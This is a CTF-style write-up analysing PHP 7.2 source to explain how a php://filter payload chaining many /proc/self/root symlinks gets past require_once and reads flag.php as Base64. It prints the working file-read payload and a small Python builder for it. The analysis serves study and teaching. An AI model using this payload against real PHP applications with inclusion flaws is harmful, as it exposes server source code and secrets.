Analyzing PHP Source Code: Bypassing the Restriction of require_once
Introduction
As we know, in PHP, require_once checks whether a file has already been included before including it again. Can we bypass this mechanism? Is there a way to read files without writing a webshell?
<?php
error_reporting(E_ALL);
require_once('flag.php');
highlight_file(__FILE__);
if(isset($_GET['content'])) {
$content = $_GET['content'];
require_once($content);
} // The code for this problem is from WMCTF2020 make php great again 2.0, the intended solution is to bypass `require_once`
PHP’s file inclusion mechanism records every included file under its resolved real path in a hash table. Once a file is in that table, require_once will not include it again.
So the question is how to get past this hash table: PHP must believe that the file name we pass is not in the table, yet still be able to locate the file and read its contents.
One piece of background knowledge: /proc/self points to the current process’s /proc/pid/, and /proc/self/root/ is a symbolic link pointing to /. With this in mind, we can bypass the check by combining the php:// pseudo-protocol with many levels of symbolic links. The payload is as follows:
php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php
// Result: PD9waHAKCiRmbGFnPSJ0ZXN0e30iOwo=
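As a small illustration, the payload can be assembled and the Base64 result decoded with a few lines of Python. This is only a sketch: `build_payload` and its `repeats` parameter are hypothetical names, and the repeat count of 22 is an assumed value chosen for illustration, since the number actually needed depends on the target system.

```python
import base64

# Stream wrapper prefix used by the payload in the text.
WRAPPER = "php://filter/convert.base64-encode/resource="


def build_payload(repeats, target="/var/www/html/flag.php"):
    """Prefix the target with `repeats` copies of /proc/self/root (hypothetical helper)."""
    return WRAPPER + "/proc/self/root" * repeats + target


# 22 is an assumed repeat count, not a value guaranteed to work everywhere.
payload = build_payload(22)

# Decode the Base64 string that the text reports as the result.
decoded = base64.b64decode("PD9waHAKCiRmbGFnPSJ0ZXN0e30iOwo=").decode()

print(payload)
print(decoded)
```

The decoded text is the source of flag.php, which confirms that the file was read rather than executed.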
Next, we analyze why the bypass works by reading the source code of PHP 7.2.23. CLion on Linux is recommended for debugging. Setting up the debugging environment is not covered here; other articles describe it.
Analysis
Organizing Thoughts
So why is this possible? Since it’s about file inclusion, let’s start by examining the function zend_include_or_eval() in zend_execute.c. There’s a bunch of switch cases here:
case ZEND_REQUIRE_ONCE: {
zend_file_handle file_handle;
zend_string *resolved_path;
resolved_path = zend_resolve_path(Z_STRVAL_P(inc_filename), (int)Z_STRLEN_P(inc_filename));
// Resolve the file's real path first; if that succeeds, the real path is the key looked up in included_files.
// If resolution fails, the name is kept as given and zend_stream_open() opens it later through the stream wrapper.
// For a name that starts with scheme://, php_resolve_path() only resolves the path when wrapper == &php_plain_files_wrapper; otherwise it returns NULL.
// Our payload uses the php:// pseudo-protocol, so zend_resolve_path() returns NULL and execution goes to the else block.
if (resolved_path) {
// Not taken for our payload
if (zend_hash_exists(&EG(included_files), resolved_path)) {
// The resolved path is already in the hash table
goto already_compiled;
}
} else {
// Keep the file name exactly as it was passed in
...
resolved_path = zend_string_copy(Z_STR_P(inc_filename));
}
// Start file inclusion using pseudo protocol, the path resolution result will be written to file_handle.opened_path
if (SUCCESS == zend_stream_open(ZSTR_VAL(resolved_path), &file_handle)) {
// Resolution result: /proc/24273/root/proc/self/root/var/www/html/flag.php
if (!file_handle.opened_path) {
// This will not be executed
file_handle.opened_path = zend_string_copy(resolved_path);
}
if (zend_hash_add_empty_element(&EG(included_files), file_handle.opened_path)) {
zend_op_array *op_array = zend_compile_file(&file_handle, (type==ZEND_INCLUDE_ONCE?ZEND_INCLUDE:ZEND_REQUIRE));
zend_destroy_file_handle(&file_handle);
zend_string_release(resolved_path);
if (Z_TYPE(tmp_inc_filename) != IS_UNDEF) {
zend_string_release(Z_STR(tmp_inc_filename));
}
return op_array;
} else {
zend_file_handle_dtor(&file_handle);
already_compiled:
new_op_array = ZEND_FAKE_OP_ARRAY;
}
} else {
if (type == ZEND_INCLUDE_ONCE) {
zend_message_dispatcher(ZMSG_FAILED_INCLUDE_FOPEN, Z_STRVAL_P(inc_filename));
} else {
zend_message_dispatcher(ZMSG_FAILED_REQUIRE_FOPEN, Z_STRVAL_P(inc_filename));
}
}
zend_string_release(resolved_path);
}
break;
How does PHP determine whether a file has been included before? It looks the file up in a hash table.
Before the lookup, the file name has to be normalized (for example, /flag.php/../flag.php still resolves to /flag.php; PHP is not stupid), and only then is it matched against the hash table.
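The lookup logic can be pictured with a toy model in Python. This is a simplified sketch, not PHP's implementation: `toy_require_once`, its `opened_path` argument, and the use of `posixpath.normpath` as a stand-in for path resolution are all assumptions made for illustration.

```python
import posixpath

# Stands in for EG(included_files): the set of paths already included.
included_files = set()


def toy_require_once(name, opened_path=None):
    """Return True if the file would be compiled, False if it is skipped.

    `opened_path` plays the role of file_handle.opened_path, i.e. the path
    reported by the stream layer after the file has been opened.
    """
    # Stand-in for zend_resolve_path(): names with a scheme:// are not resolved.
    resolved = None if "://" in name else posixpath.normpath(name)
    if resolved is not None and resolved in included_files:
        return False  # first check: the resolved name is already known
    key = opened_path or resolved or name
    if key in included_files:
        return False  # second check: the opened path is already known
    included_files.add(key)
    return True


first = toy_require_once("/var/www/html/flag.php")
same_file = toy_require_once("/var/www/html/../html/flag.php")
wrapper_short = toy_require_once(
    "php://filter/resource=/var/www/html/flag.php",
    opened_path="/var/www/html/flag.php",
)
wrapper_long = toy_require_once(
    "php://filter/resource=(long /proc/self/root chain)",
    opened_path="/proc/24273/root/proc/self/root/var/www/html/flag.php",
)
print(first, same_file, wrapper_short, wrapper_long)
```

In this model the second and third calls are rejected because their keys collapse to /var/www/html/flag.php, while the last call passes because the opened path it reports is a different string.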
According to the given code, the include order is index.php -> flag.php -> $content, so we first use a pseudo-protocol to skip the initial check. However, if the chain of /proc/self/root segments is shortened, the resolved opened_path becomes /var/www/html/flag.php. Why is that? To find out, we trace the code and look for where opened_path is modified when require_once($content) calls zend_stream_open().
On the Right Track
Following the code, we find that php_stream_open_for_zend_ex passes the pointer &handle->opened_path as the third argument to _php_stream_open_wrapper_ex(), which then returns.
Using CLion’s “Evaluate Expression” feature, we can see that the address of &handle->opened_path is 0x7ffd908b3580. We need to find where it is written and where the written value is generated. First, we find that it is written at line 1026 of plain_wrapper.c, in _php_stream_fopen():
/*
At this point, `_php_stream_open_wrapper_ex` is executed here:
if (wrapper) {
if (!wrapper->wops->stream_opener) {
php_stream_wrapper_log_error(wrapper, options ^ REPORT_ERRORS,
"wrapper does not support stream open");
} else {
----> stream = wrapper->wops->stream_opener(wrapper,
path_to_open, mode, options ^ REPORT_ERRORS,
opened_path, context STREAMS_REL_CC);
}
*/
#ifdef PHP_WIN32
fd = php_win32_ioutil_open(realpath, open_flags, 0666);
#else
fd = open(realpath, open_flags, 0666);
#endif
if (fd != -1) {
if (options & STREAM_OPEN_FOR_INCLUDE) {
ret = php_stream_fopen_from_fd_int_rel(fd, mode, persistent_id);
} else {
ret = php_stream_fopen_from_fd_rel(fd, mode, persistent_id);
}
if (ret) {
if (opened_path) {
// Write realpath to opened_path
*opened_path = zend_string_init(realpath, strlen(realpath), 0);
}
if (persistent_id) {
efree(persistent_id);
}
Now that we know where opened_path is written, we need to find out how realpath gets its value. Evaluate Expression gives its address: 0x7ffebc13cd50.
A little earlier in the same function, we can see that expand_filepath is what fills in realpath with the value we are looking for, /proc/24273/root/proc/self/root/var/www/html/flag.php:
if (options & STREAM_ASSUME_REALPATH) {
// Treat the incoming filename as the real path directly, but it is not executed here
strlcpy(realpath, filename, sizeof(realpath));
} else {
if (expand_filepath(filename, realpath) == NULL) {
// Expand the filename to find the real path
return NULL;
}
}
Following expand_filepath leads to virtual_file_ex, where tsrm_realpath_r is called to produce the resolution result resolved_path; after some processing, the result is passed back through state:
add_slash = (use_realpath != CWD_REALPATH) && path_length > 0 && IS_SLASH(resolved_path[path_length-1]);
t = CWDG(realpath_cache_ttl) ? 0 : -1;
path_length = tsrm_realpath_r(resolved_path, start, path_length, &ll, &t, use_realpath, 0, NULL);
// The path resolution result actually comes from tsrm_realpath_r, passed through resolved_path
// The value is '/proc/24273/root/proc/self/root/var/www/html/flag.php'
// Then after the following processing, it turns out that nothing has been done
...
if (verify_path) {
...
} else {
state->cwd_length = path_length;
tmp = erealloc(state->cwd, state->cwd_length+1);
state->cwd = (char *) tmp;
// The result is written to state->cwd here, and this result is returned through state.
memcpy(state->cwd, resolved_path, state->cwd_length+1);
ret = 0;
}
/* Stacktrace
virtual_file_ex zend_virtual_cwd.c:1385
expand_filepath_with_mode fopen_wrappers.c:816
expand_filepath_ex fopen_wrappers.c:754
expand_filepath fopen_wrappers.c:746
_php_stream_fopen plain_wrapper.c:991
*/
The result is then written back in expand_filepath_with_mode:
if (virtual_file_ex(&new_state, filepath, NULL, realpath_mode)) {
// Remember the earlier virtual_file_ex: on success its result is in new_state.cwd
efree(new_state.cwd);
return NULL;
}
if (real_path) {
copy_len = new_state.cwd_length > MAXPATHLEN - 1 ? MAXPATHLEN - 1 : new_state.cwd_length;
memcpy(real_path, new_state.cwd, copy_len);
// This is where it is written. To confirm, check that the address of real_path is 0x7ffebc13cd50.
real_path[copy_len] = '\0';
} else {
real_path = estrndup(new_state.cwd, new_state.cwd_length);
}
Path Resolution
We have verified where the value comes from and where it goes. Now let’s see how the path escapes the check.
tsrm_realpath_r resolves the real path. This pile of string-parsing code is a headache, and it also calls itself recursively.
What does this function do? It scans the path from back to front, handles the special cases . .. //, and adjusts the total length of the path. For example, when it encounters /var/www/.., it removes www/.. and leaves /var, then continues with the steps below. Finally, it passes the path to tsrm_realpath_r again as a recursive call.
So let it recurse first. Run to the innermost call, the one about to return, and look at the parameters the function receives at each level of recursion.
In simple terms, the recursion works from back to front: /var/www/html/1.php -> /var/www/html -> /var/www.
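The back-to-front order can be reproduced with a short Python sketch. It mirrors only the scanning loop (`i = len; while (i > start && !IS_SLASH(path[i-1])) i--;`) and the `i - 1 <= start` stop condition; `visited_prefixes` is a hypothetical helper, and symbolic links, the cache, and the . .. // special cases are deliberately left out.

```python
def visited_prefixes(path, start=1):
    """List the prefixes a tsrm_realpath_r-style recursion would visit."""
    visited = []
    length = len(path)
    while True:
        visited.append(path[:length])
        # Scan backwards to the character just after the last slash.
        i = length
        while i > start and path[i - 1] != "/":
            i -= 1
        if i - 1 <= start:
            # Nothing left in front of this component: recursion stops here.
            return visited
        # The next level receives everything before that slash.
        length = i - 1


prefixes = visited_prefixes("/var/www/html/1.php")
for prefix in prefixes:
    print(prefix)
```

Each entry is the `path[0..len)` that one level of recursion sees; the last one, /var, is where `i - 1 <= start` ends the descent.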
This is what the stack looks like. Every frame appears to be the same except the one at line 1137. Why? Let’s trace again and note which recursion that is. Set a breakpoint on the first line of tsrm_realpath_r and count the recursions to see what is different in this call. The easiest way is to press F9 (resume program) once per recursion. For convenience, let’s call the call made from line 1137 the nth recursion, abbreviated as (n):
tsrm_realpath_r zend_virtual_cwd.c:756 (n+4) return 1
tsrm_realpath_r zend_virtual_cwd.c:1124 (n+3) return 1
tsrm_realpath_r zend_virtual_cwd.c:1164 (n+2) return 5
tsrm_realpath_r zend_virtual_cwd.c:1164 (n+1)
tsrm_realpath_r zend_virtual_cwd.c:1137 (n)
tsrm_realpath_r zend_virtual_cwd.c:1164 (n-1)
tsrm_realpath_r zend_virtual_cwd.c:1164
...
tsrm_realpath_r zend_virtual_cwd.c:1164 (1)
tsrm_realpath_r zend_virtual_cwd.c:1164
Leaving aside the irrelevant ZEND_WIN32 parts, we find that each recursion first handles the special cases . .. //. For the whole chain (0)...(n-1), php_sys_lstat(path, &st) returns -1, but at (n) php_sys_lstat(path, &st) returns 0.
static int tsrm_realpath_r(char *path, int start, int len, int *ll, time_t *t, int use_realpath, int is_dir, int *link_is_dir) /* {{{ */
{
int i, j, save;
int directory = 0;
#ifdef ZEND_WIN32
...
#else
zend_stat_t st;
#endif
realpath_cache_bucket *bucket;
char *tmp;
ALLOCA_FLAG(use_heap)
while (1) {
if (len <= start) {
if (link_is_dir) {
*link_is_dir = 1;
}
return start;
}
i = len;
while (i > start && !IS_SLASH(path[i-1])) {
i--;
}
/* Special case for . .. // */
if (i == len ||
(i == len - 1 && path[i] == '.')) {
/* remove double slashes and '.' */
...
} else if (i == len - 2 && path[i] == '.' && path[i+1] == '.') {
/* remove '..' and previous directory */
...
}
path[len] = 0;
save = (use_realpath != CWD_EXPAND);
if (start && save && CWDG(realpath_cache_size_limit)) {
/* cache lookup for absolute path */
...
}
#ifdef ZEND_WIN32
...
#else
// The save value from (0)...(n-1) is 1 here
if (save && php_sys_lstat(path, &st) < 0) {
// (0)...(n-1) can enter here because php_sys_lstat(path, &st)=-1, while (n) and later cannot!
if (use_realpath == CWD_REALPATH) {
/* file not found */
return -1;
}
/* continue resolution anyway but don't save result in the cache */
// The save value for (0)...(n-1) is 0
save = 0;
}
tmp = do_alloca(len+1, use_heap);
// Copy path to tmp
memcpy(tmp, path, len+1);
// Since the save value for (n) is 1, continue to determine if it is a symbolic link or not
// st.st_mode is the file's type and permission, S_ISLNK returns whether it is a symbolic link
if (save && S_ISLNK(st.st_mode)) {
// The path before the call is: "."
// php_sys_readlink is used to read the real location pointed by a symbolic link and write it to the path variable, where j is the length.
if (++(*ll) > LINK_MAX || (j = php_sys_readlink(tmp, path, MAXPATHLEN)) < 0) {
/* too many links or broken symlinks */
free_alloca(tmp, use_heap);
return -1;
}
path[j] = 0;
// Terminate the string with \0; at this point path holds the pid of the process
if (IS_ABSOLUTE_PATH(path, j)) {
j = tsrm_realpath_r(path, 1, j, ll, t, use_realpath, is_dir, &directory);
if (j < 0) {
free_alloca(tmp, use_heap);
return -1;
}
} else {
if (i + j >= MAXPATHLEN-1) {
free_alloca(tmp, use_heap);
return -1; /* buffer overflow */
}
memmove(path+i, path, j+1);
memcpy(path, tmp, i-1);
path[i-1] = DEFAULT_SLASH;
j = tsrm_realpath_r(path, start, i + j, ll, t, use_realpath, is_dir, &directory);
if (j < 0) {
free_alloca(tmp, use_heap);
return -1;
}
}
if (link_is_dir) {
*link_is_dir = directory;
}
} else {
if (save) {
directory = S_ISDIR(st.st_mode);
if (link_is_dir) {
*link_is_dir = directory;
}
if (is_dir && !directory) {
/* not a directory */
free_alloca(tmp, use_heap);
return -1;
}
}
if (i - 1 <= start) {
j = start;
} else {
/* some leading directories may be unaccessible */
j = tsrm_realpath_r(path, start, i-1, ll, t, save ? CWD_FILEPATH : use_realpath, 1, NULL); //line 1164, the call of (1)...(n).
if (j > start) {
path[j++] = DEFAULT_SLASH;
}
}
if (j < 0 || j + len - i >= MAXPATHLEN-1) {
free_alloca(tmp, use_heap);
return -1;
}
memcpy(path+j, tmp+i, len-i+1);
j += (len-i);
}
if (save && start && CWDG(realpath_cache_size_limit)) {
/* save absolute path in the cache */
realpath_cache_add(tmp, len, path, j, directory, *t);
}
free_alloca(tmp, use_heap);
return j;
}
}
Symbolic Links
Let’s think about what our payload really is. Does it create a loop of symbolic links? And what is php_sys_lstat()?
php_sys_lstat() is actually the Linux function lstat(), which retrieves information about a file. It returns 0 on success and -1 on failure, setting errno. Because our path contains too many symbolic links, errno is ELOOP for every failing call. The maximum number of symbolic links that may be traversed is determined by SYMLOOP_MAX, which is a runtime value and cannot be smaller than _POSIX_SYMLOOP_MAX.
After calling php_sys_lstat(), we can use perror() to verify that errno is ELOOP.
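The same check can be made outside the debugger. The sketch below is an illustration in Python, not part of the original debugging session: it creates a symbolic link `s` that points to `.` in a temporary directory, so every `s` component in a path is one more link to follow, and then inspects errno after `os.lstat`. The helper name `lstat_errno` and the repeat counts 3 and 200 are arbitrary choices.

```python
import errno
import os
import tempfile


def lstat_errno(path):
    """Return 0 if lstat succeeds, otherwise the errno it failed with."""
    try:
        os.lstat(path)
        return 0
    except OSError as exc:
        return exc.errno


with tempfile.TemporaryDirectory() as tmp:
    # s -> . : following s always lands back in the same directory.
    os.symlink(".", os.path.join(tmp, "s"))
    short_errno = lstat_errno(tmp + "/s" * 3)    # a few links: resolvable
    long_errno = lstat_errno(tmp + "/s" * 200)   # far too many links

print(short_errno, errno.errorcode.get(long_errno))
```

On a Linux system the long path is expected to fail with ELOOP, which is the errno the text attributes to the failing php_sys_lstat() calls.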
Following the sysconf documentation, we tried to evaluate sysconf(_SC_SYMLOOP_MAX) and sysconf(_POSIX_SYMLOOP_MAX) with CLion’s expression evaluation feature, but this did not yield a usable value: SYMLOOP_MAX came back as -1. So we need another way to get the value. The simplest is to find it experimentally by brute force.
import os

# Create a regular file l00, then the chain l01 -> l00, l02 -> l01, ..., l99 -> l98.
os.system("echo 233> l00")
for i in range(0, 99):
    os.system("ln -s l%02d l%02d" % (i, i + 1))
Then run ls -al and observe that the symbolic link l42 is invalid. The last valid symbolic link is l41, so the valid chain is 41->40, 40->39, ..., 01->00. There are therefore 41 valid symbolic links in total, which makes SYMLOOP_MAX equal to 40: the number of symbolic links that point to other symbolic links.
Therefore, with a long run of /proc/self/root segments, tsrm_realpath_r recurses from back to front until php_sys_lstat returns 0, and at that point the resolution succeeds.
The path at the moment of success looks like this: /proc/self is a symbolic link pointing to the current process’s pid, and root under self is also a symbolic link. Counting them gives 41 as well, which is exactly right.
>>> a = "/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self"
>>> print(a.count("self")+a.count("root"))
41
Let’s verify. Using CLion’s expression evaluation feature, we can see:
lstat("/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self") # returns 0.
lstat("/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root") # returns -1
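The boundary between the two lstat() calls above can also be located programmatically. The following Python sketch is an assumption-laden stand-in for the /proc experiment: it uses a self-referencing link `s -> .` in a temporary directory instead of /proc/self/root, and `deepest_lstat_ok` is a hypothetical helper. The number it reports depends on the kernel and on any symbolic links in the temporary directory's own path.

```python
import os
import tempfile


def deepest_lstat_ok(max_depth=200):
    """Return the largest number of chained link components lstat accepts."""
    with tempfile.TemporaryDirectory() as tmp:
        # s -> . : each extra "/s" adds one symbolic link to the path.
        os.symlink(".", os.path.join(tmp, "s"))
        deepest = 0
        for depth in range(1, max_depth + 1):
            try:
                # lstat follows every component except the last one.
                os.lstat(tmp + "/s" * depth)
            except OSError:
                break
            deepest = depth
        return deepest


print(deepest_lstat_ok())
```

Because lstat() does not follow the final component, the reported depth is one more than the number of links the kernel was willing to follow, which is the same relationship as between the 41 links counted above and the limit of 40.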
Recursive Analysis
Since php_sys_lstat() returns 0, what happens in (n)?
// Earlier debugging showed that save is 1 for (n) and every later call.
// "/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self" is actually "/proc/self", which is a symbolic link and represents the process's pid. S_ISLNK is used to determine if it is a symbolic link.
if (save && S_ISLNK(st.st_mode)) {
// Before the function call, the path is:
// php_sys_readlink reads the real location pointed to by the symbolic link and writes it to the path variable. j is the length.
if (++(*ll) > LINK_MAX || (j = php_sys_readlink(tmp, path, MAXPATHLEN)) < 0) {
/* too many links or broken symlinks */
free_alloca(tmp, use_heap);
return -1;
}
path[j] = 0;
// Append a '\0' at the end to complete the read operation. The current path is the process's pid and path="24273".
if (IS_ABSOLUTE_PATH(path, j)) {
// Obviously, "24273" is not an absolute path, so let's see the else branch.
j = tsrm_realpath_r(path, 1, j, ll, t, use_realpath, is_dir, &directory);
if (j < 0) {
free_alloca(tmp, use_heap);
return -1;
}
} else {
if (i + j >= MAXPATHLEN-1) {
free_alloca(tmp, use_heap);
return -1; /* buffer overflow */
}
// Start constructing the path, first move path[0...j] backward to path[i].
// j+1 is the number of elements, from index 0 to index j is a total of j+1 elements.
memmove(path+i, path, j+1);
// Copy tmp[0...i-1] back to path[0...i-2].
// i-1 is the number of elements, from index 0 to index i-2 is a total of i-1 elements.
memcpy(path, tmp, i-1);
path[i-1] = DEFAULT_SLASH;
// Add a / to the path. At this point, the path becomes "/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/24273"
j = tsrm_realpath_r(path, start, i + j, ll, t, use_realpath, is_dir, &directory);
// This is recursive call (n+1)
if (j < 0) {
free_alloca(tmp, use_heap);
return -1;
}
}
if (link_is_dir) {
*link_is_dir = directory;
}
}
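The memmove/memcpy sequence in the else branch is easier to follow on a small buffer. The sketch below replays it in Python on a bytearray; `splice_relative_link` is a hypothetical name, the buffer is sized to fit rather than MAXPATHLEN, and the example path is shortened to a single /proc/self/root level.

```python
def splice_relative_link(tmp, target):
    """Replace the last component of `tmp` with a relative link target."""
    i = tmp.rfind("/") + 1                 # index just past the last slash
    j = len(target)                        # length returned by readlink
    path = bytearray(i + j + 1)            # stand-in for the path buffer
    path[0:j + 1] = target.encode() + b"\0"    # readlink result sits at path[0]
    path[i:i + j + 1] = path[0:j + 1]          # memmove(path+i, path, j+1)
    path[0:i - 1] = tmp.encode()[0:i - 1]      # memcpy(path, tmp, i-1)
    path[i - 1] = ord("/")                     # path[i-1] = DEFAULT_SLASH
    return path[:i + j].decode()


spliced = splice_relative_link("/proc/self/root/proc/self", "24273")
print(spliced)
```

The link name self is overwritten by its target, so the path handed to the next recursion ends in /proc/24273 and has length i + j.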
When we reach (n+1), path is no longer a symbolic link, so execution enters the else branch:
} else {
if (save) {
directory = S_ISDIR(st.st_mode);
// If `link_is_dir` was passed in, store `directory` through the pointer
if (link_is_dir) {
*link_is_dir = directory;
}
if (is_dir && !directory) {
/* not a directory */
free_alloca(tmp, use_heap);
return -1;
}
}
if (i - 1 <= start) {
j = start;
} else {
/* some leading directories may be unaccessible */
// Line 1164: save=1 here, so the next recursive call (n+2) is made with CWD_FILEPATH.
// `path` remains unchanged, same as (n), but the passed-in `link_is_dir` becomes NULL
j = tsrm_realpath_r(path, start, i-1, ll, t, save ? CWD_FILEPATH : use_realpath, 1, NULL);
// Got j=1
if (j > start) {
path[j++] = DEFAULT_SLASH;
}
}
#ifdef ZEND_WIN32
...
#else
if (j < 0 || j + len - i >= MAXPATHLEN-1) {
free_alloca(tmp, use_heap);
return -1;
}
// Copy tmp[i...len] (the last path component plus its trailing \0) to path[j...j+len-i]
// That is, append the last component of tmp right after the resolved prefix in path
memcpy(path+j, tmp+i, len-i+1);
j += (len-i);
// Recalculate the total length and return it, the new path is "/proc", j=5.
}
(n+2) behaves the same as (n+1): it also makes the next recursive call at line 1164, passing the following path on to (n+3):
/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc
Recursive call to tsrm_realpath_r()
In (n+3), tsrm_realpath_r has already stripped the trailing /proc from the path. What remains is /proc/self.../root, which is a symbolic link.
As before, since it is a symbolic link and save is 1, php_sys_readlink is called to read the link. What does it return? It returns /.
if (++(*ll) > LINK_MAX || (j = php_sys_readlink(tmp, path, MAXPATHLEN)) < 0) {
/* too many links or broken symlinks */
free_alloca(tmp, use_heap);
return -1;
}
path[j] = 0;
// path = "/", j = 1
if (IS_ABSOLUTE_PATH(path, j)) {
// When it enters here is_dir =1 , directory=0, go to (n+4), this is the last time
// tsrm_realpath_r("/", 1, 1, ll, t, 1, 1, &directory) with return value j=1
j = tsrm_realpath_r(path, 1, j, ll, t, use_realpath, is_dir, &directory);
if (j < 0) {
free_alloca(tmp, use_heap);
return -1;
}
} else {
...
}
if (link_is_dir) {
*link_is_dir = directory;
}
Recursive call returns
Then, at the top of the while (1) loop in (n+4), len <= start, so the function returns early with the value start=1:
while (1) {
//len=1, start=1
if (len <= start) {
if (link_is_dir) {
*link_is_dir = 1;
}
return start;
}
Back in (n+3), the value returned to (n+2) is also 1, but before (n+2) returns to (n+1), it does some additional work:
} else {
if (save) {
...
}
if (i - 1 <= start) {
j = start;
} else {
/* some leading directories may be unaccessible */
j = tsrm_realpath_r(path, start, i-1, ll, t, save ? CWD_FILEPATH : use_realpath, 1, NULL);
// j = 1, start = 1
if (j > start) {
path[j++] = DEFAULT_SLASH;
}
}
if (j < 0 || j + len - i >= MAXPATHLEN-1) {
free_alloca(tmp, use_heap);
return -1;
}
// With j = 1 from above, copy tmp[i...len] to path[1...1+len-i]
// len is the total length of the string passed in; i and len are determined before the special handling of '. .. //'
// For example, if path is '/var/www/html/', i is the index just past the / after html
/*
761 i = len;
762 while (i > start && !IS_SLASH(path[i-1])) {
763 i--;
764 }
*/
memcpy(path+j, tmp+i, len-i+1);
j += (len-i);
// Recalculate the total length and return it: the new path is "/proc", j=5, returned to (n+1).
}
(n+1) then returns to (n):
if (save && S_ISLNK(st.st_mode)) {
...
} else {
if (save) {
...
}
if (i - 1 <= start) {
j = start;
} else {
/* some leading directories may be unaccessible */
j = tsrm_realpath_r(path, start, i-1, ll, t, save ? CWD_FILEPATH : use_realpath, 1, NULL);
// path="/proc", j=5, start=1
if (j > start) {
path[j++] = DEFAULT_SLASH;
// Append a '/', j+=1, now j=6
}
}
if (j < 0 || j + len - i >= MAXPATHLEN-1) {
free_alloca(tmp, use_heap);
return -1;
}
// With j=6 from above, copy tmp[i...len] to path[6...6+len-i]
/*
tmp="/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/74079"
*/
memcpy(path+j, tmp+i, len-i+1);
j += (len-i);
// Recalculate the total length, return it, the new path is "/proc/24273", j=11, return to (n).
}
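The two return steps traced above come down to one small operation: take the prefix that the deeper call resolved, add a slash if the prefix is longer than start, and append the last component saved in tmp. A minimal Python sketch of that step, with `append_component` as a hypothetical helper and string slicing standing in for `memcpy(path+j, tmp+i, len-i+1)`:

```python
def append_component(resolved_prefix, tmp, start=1):
    """Rebuild the path on the way back up from a recursive call."""
    i = tmp.rfind("/") + 1          # start of the last component in tmp
    path = resolved_prefix
    if len(path) > start:           # if (j > start) path[j++] = DEFAULT_SLASH;
        path += "/"
    return path + tmp[i:]           # memcpy(path+j, tmp+i, len-i+1)


# (n+2) returning to (n+1): the deeper call resolved the prefix to "/".
step_one = append_component("/", "/proc/self/root/proc")
# (n+1) returning to (n): the prefix is now "/proc".
step_two = append_component(step_one, "/proc/self/root/proc/24273")
print(step_one, len(step_one))
print(step_two, len(step_two))
```

The lengths 5 and 11 match the values of j noted in the comments for these two returns.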
Finally, returning from (n) to (0) is a matter of copying and concatenating the remaining path components one by one, and the final result is /proc/24273/root/proc/self/root/var/www/html/flag.php.
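The whole walk can be replayed in a toy model. The Python sketch below is a heavily simplified imitation of tsrm_realpath_r, written for illustration only: the file system is faked with two symbolic links taken from the walkthrough, the kernel limit of 40 followed links is an assumption, `fake_lstat` and `toy_realpath_r` are hypothetical names, and the cache, LINK_MAX counter, and . .. // handling are omitted.

```python
# Fake symbolic links from the walkthrough; everything else "exists" as-is.
SYMLINKS = {"/proc/self": "24273", "/proc/24273/root": "/"}
MAX_FOLLOW = 40  # assumption: at most 40 links are followed per lookup


def fake_lstat(path):
    """Return the link target if the final component is a symlink, "" if it
    is not, or None when too many links had to be followed (ELOOP)."""
    todo = [c for c in path.split("/") if c]
    cur, follows = "", 0
    while todo:
        comp = todo.pop(0)
        candidate = cur + "/" + comp
        target = SYMLINKS.get(candidate)
        if target is None:
            cur = candidate
        elif not todo:
            return target               # lstat does not follow the last component
        else:
            follows += 1
            if follows > MAX_FOLLOW:
                return None
            if target.startswith("/"):
                cur = ""                # absolute target: restart from the root
            todo = [c for c in target.split("/") if c] + todo
    return ""


def toy_realpath_r(path, start=1):
    if len(path) <= start:
        return path[:start]
    i = path.rfind("/") + 1
    target = fake_lstat(path)
    if target:                          # lstat succeeded and path is a symlink
        if target.startswith("/"):
            return toy_realpath_r(target, 1)
        return toy_realpath_r(path[:i - 1] + "/" + target, start)
    # lstat failed, or path is not a symlink: resolve the parent, keep the name
    if i - 1 <= start:
        prefix = path[:start]
    else:
        prefix = toy_realpath_r(path[:i - 1], start)
        if len(prefix) > start:
            prefix += "/"
    return prefix + path[i:]


long_chain = toy_realpath_r("/proc/self/root" * 22 + "/var/www/html/flag.php")
short_chain = toy_realpath_r("/proc/self/root" * 5 + "/var/www/html/flag.php")
print(long_chain)
print(short_chain)
```

Under these assumptions the long chain resolves to /proc/24273/root/proc/self/root/var/www/html/flag.php, while the short chain collapses to /var/www/html/flag.php: only components for which lstat fails are copied through unresolved, which is what lets the long payload produce a path that is not yet in the hash table.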
Summary
When debugging source code, it’s best to use a top-down approach.
To find out where a value comes from and where it goes when it is passed by pointer, take its address and compare it with the addresses of the arguments in each frame of the call stack.
